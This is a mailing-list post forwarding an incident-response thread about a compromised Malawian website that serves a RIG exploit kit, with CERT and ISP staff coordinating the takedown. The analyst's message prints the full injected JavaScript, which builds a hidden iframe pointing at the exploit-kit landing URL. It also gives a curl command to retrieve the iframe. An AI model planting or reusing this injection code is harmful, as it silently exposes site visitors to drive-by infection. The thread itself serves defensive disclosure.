[Cyber-security-tech-mw-l] Fwd: Re: IIDINCIDENT-320592# Exploit Kit activity on 41.216.230.122 - exploitsuniversity.com
Dr Paulos B Nyirenda
paulos at sdnp.org.mw
Tue Jan 3 15:41:08 CAT 2017
Here is a cyber security complaint example made by AfricaCERT on behalf United States
Department of Health and Human Services, of a compromised website traced to Malawi that
has a RIG exploit kit placed in it's source code.
We need to be aware of such incidents as we develop the Malawi National Cyber Security
Strategy as we are doing now, can we learn from it?
Regards,
Dr Paulos B Nyirenda
NIC.MW & .mw ccTLD
http://www.registrar.mw
------- Forwarded message follows -------
Subject: Fwd: Re: IIDINCIDENT-320592# Exploit Kit activity on 41.216.230.122 -
exploitsuniversity.com
To: paulos at sdnp.org.mw
From: Jean-Robert Hountomey <hrobert at africacert.org>
Date sent: Tue, 3 Jan 2017 02:48:08 -0600
Hi Paulos,
Thanks Very much. He has responded and is investigating. I will call IID later today.
Thanks.
Regards.
Jean-Robert.
-------- Forwarded Message --------
Subject:
Re: IIDINCIDENT-320592# Exploit Kit activity on 41.216.230.122 -
exploitsuniversity.com
Date:
Tue, 03 Jan 2017 10:30:38 +0200
From:
Saman K Dissanayake <saman at globemw.net>
To:
alert at internetidentity.com, globalcc at africacert.org
Dear All
well noted. Let me investigate locally and rectify who is the right
customer and take necessary action accordingly.
Once we identified right client , we take necessary action
accordingly.
Saman
------- Forwarded message follows -------
Date sent: Tue, 03 Jan 2017 10:24:04 +0200
Subject: Re: SAMAN: (Fwd) help with coordination in mw
From: Saman K Dissanayake <saman at globemw.net>
To: Dr Paulos B Nyirenda <paulos at sdnp.org.mw>
Dear Paulos
Let me investigate internally and advise them to get in touch with specific client for
the same.
I am quite sure Client may be hosting their web on our ip something related to that .
I will update you shortly.
Saman
From: Dr Paulos B Nyirenda <paulos at sdnp.org.mw >
Date: Mon, 02 Jan 2017 23:04:46 +0200
To: "D.M.S.K.Dissanayake" <saman at globemw.net>
Cc: Dr Paulos B Nyirenda <paulos at sdnp.org.mw>
Subject: SAMAN: (Fwd) help with coordination in mw
Saman,
Here is a CERT complaint involving an IP address that seems to be on the Globe Network.
Can you please review this and let me know if there is anything that you can do about it?
Do you need help ?
Such CERT reports could benefit others is properly circulated. Would it be ok with you and
with Globe if I circulated this to the MISPA e-mail list ?
Regards,
PC
======================
Dr Paulos B Nyirenda
NIC.MW & .mw ccTLD
http://www.registrar.mw
------- Forwarded message follows -------
Subject: [SPAM] help with coordination in mw
To: paulos at sdnp.org.mw,
" ernest.boka at africacert.org" <ernest.boka at africacert.org>
From: Jean-Robert Hountomey <hrobert at africacert.org>
Date sent: Sat, 31 Dec 2016 16:16:38 -0600
Dear Paulos,
There is a complaint on behalf United States Department of Health
and Human Services.
There is a compromised website that has a RIG exploit kit placed in
it's source code.
The provider of the site has been contacted several times over the
past month, no longer wishes to be contacted unless someone is sent
locally.
Our investigation team can confirm that no action has been taken on
this site to remove the exploit kit.
Do you know someone we can contact for assistance?
Compromised URL:
http://www.exploitsuniversity.com/index.php/academic-programs
IP: 41.216.230.122
Length of incident: 1543 hours(live)
Provider: GlobalMW.net
inetnum: 41.216.230.0 - 41.216.230.127
netname: WIRELESS-BROADBAND-BT-GIL
descr: Use for broadband wireless Customer in Blantyre
country: MW
admin-c: gil-td
tech-c: gil-td
status: ASSIGNED PA
mnt-by: GIL-MNT
source: AFRINIC # Filtered
parent: 41.216.228.0 - 41.216.231.255
person: Saman K dissanayake
address: P O Box 5025
limbe
malawi
phone: +2658841363
fax-no: +2651841854
nic-hdl: gil-td
source: AFRINIC # Filtered
Thanks.
Regards.
Jean-Robert
No virus found in this message.
Checked by AVG - www.avg.com
Version: 2016.0.7924 / Virus Database: 4739/13673 - Release Date: 12/30/16
------- End of forwarded message -------
No virus found in this message.
Checked by AVG - www.avg.com
Version: 2016.0.7996 / Virus Database: 4749/13697 - Release Date: 01/03/17
------- End of forwarded message -------
On 31/12/2016, 9:38 AM, "alert at internetidentity.com"
<alert at internetidentity.com> wrote:
>Hi team,
>
>My name is Keith and I am contacting you from a cyber security company in
>the United States on behalf of the United States Department of Health and
>Human Services. We've run into some difficulty with a compromised website
>that has a RIG exploit kit placed in it's source code. We've contacted
>the provider of the site several times over the past month, and we just
>received word yesterday that the provider no longer wishes to be
>contacted unless we send someone locally. Our investigation team can
>confirm that no action has been taken on this site to remove the exploit
>kit.
>
>I will copy as much information as I can from the correspondence between
>our team, the provider, and our investigative team.
>
>Compromised URL:
>http://www.exploitsuniversity.com/index.php/academic-programs
>IP: 41.216.230.122
>Length of incident: 1543 hours(live)
>Provider: GlobalMW.net
>
>
>Notes:
>This URL was submitted to us by HHS. It was then sent over to our Tier II
>team for investigation. The team came back with a template to send to all
>providers for compromised websites.
>
>==Summary==
>Hi Sanjeewa,
>
>My name is Keith and I'm a fraud analyst from IID. I'm not sure if you
>had received our previous email, but our Tier II team(the only one who
>can check if these are still live for us) stated that this URL is still
>showing the exploit kit iframe.
>
>(Please note that all URLs within this message have been disabled by
>converting 'http://' to 'hXXp://' and '.' to '[.]' these changes must
>be reversed before attempting to access any URLs in this message.)
>
>The exploit kit iframe is still present at the following URL:
>
>hXXp://www[.]exploitsuniversity[.]com/index.php/academic-programs
>
>We used following curl command to retrieve the malicious iframe:
>
>curl -L -H 'Referer:
>hXXp://www[.]exploitsuniversity[.]com/index.php/academic-programs' -H
>'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0)
>like Gecko'
>'hXXp://www[.]exploitsuniversity[.]com/index.php/academic-programs'
>
>This command (after removing the XXs and [.]s) returned the source code
>of the page. You can see the malicious iframe is at the very bottom of
>the source, after all of the page components:
>
><script type="text/javascript"> var anhso =
>document.createElement("iframe"); var ezbudf = ""; anhso.style.width =
>"16px"; anhso.style.height = "12px"; anhso.style.border = "0px";
>anhso.frameBorder = "0"; anhso.setAttribute("frameBorder", "0");
>document.body.appendChild(anhso); ezbudf =
>"http://qz18l.governaningret.top/?znePf7KUKx3LD4A=l3SKfPrfJxzFGMSUb-nJDa9G
>P0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQ
>LfyhSWksODrkHcaAJNqcOWHbBt2lqnnOASIZp1wESKvGNQyehOQFFd"; anhso.src =
>ezbudf; </script>
>
>If you aren't seeing the malicious iframe, please note that it only
>displays ONCE to any given IP address. If you attempt to visit the page
>again from the same IP, the malicious iframe will no longer appear.
>Furthermore, public proxy services (such as Tor) are often excluded from
>viewing the malicious iframe even on the first visit. As such, we
>recommend using a private VPN service in order to properly investigate
>exploit kit content. Attached are some screenshots from my terminal.
>
>I hope this helps.
>
>Best regards,
>
>Keith N
>Fraud Analyst
>IID Security Team
>==end summary==
>
>That was not the original template we sent to Sanjeewa, who we were told
>was the point of contact for GlobalMW, the provider for this IP address.
>Sanjeewa works in Software Development. We were told to contact their
>department from Customer Support via a phone connection made on 12/8/16.
>That was my reply to him after he was unable to verify the malicious
>iframe. Our Tier II team then came back and reported further instructions
>such as which VPN service to use, and we were then told to not to contact
>Sanjeewa further. So I'm not really sure what to do with this anymore, as
>it's still an active exploit, but unless we go to the registrar and ask
>that the domain be NX'd, which is a long shot due to policies in place to
>prevent requests like those, our other option is either Law Enforcement
>or CERT. Sanjeewa requested that maybe someone could assist him locally.
>I know AfricaCERT has several countries under their purview, so I was
>hoping that one of your team might be able to assist Sanjeewa in
>reproducing the malicious iframe so that he can take necessary action on
>this site. If Sanjeewa wishes to no longer be part of working on this
>issue, there's others that may be willing to work on this to get it
>removed. The email lists for the abuse contacts we have are CC'd on this
>email, as well as the Network Engineer who's name appears on the IPWhois
>and Sanjeewa in Web Development.
>
>I hope to hear back regarding AfricaCERT's assistance on this issue. If
>you have any other questions, feel free to write back and either myself
>or one of my team will respond within the day.
>
>Best regards,
>
>Keith N
>Fraud Analyst
>IID Security Team
>+1 253-590-4100 x3 -> x4
No virus found in this message.
Checked by AVG - www.avg.com
Version: 2016.0.7996 / Virus Database: 4749/13697 - Release Date: 01/03/17
------- End of forwarded message -------
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://chambo3.sdnp.org.mw/pipermail/cyber-security-tech-mw-l/attachments/20170103/df59c5f1/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: -
Type: application/octet-stream
Size: 6711 bytes
Desc: not available
URL: <http://chambo3.sdnp.org.mw/pipermail/cyber-security-tech-mw-l/attachments/20170103/df59c5f1/attachment-0002.obj>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: -
Type: application/octet-stream
Size: 8849 bytes
Desc: not available
URL: <http://chambo3.sdnp.org.mw/pipermail/cyber-security-tech-mw-l/attachments/20170103/df59c5f1/attachment-0003.obj>
More information about the Cyber-security-tech-mw-l
mailing list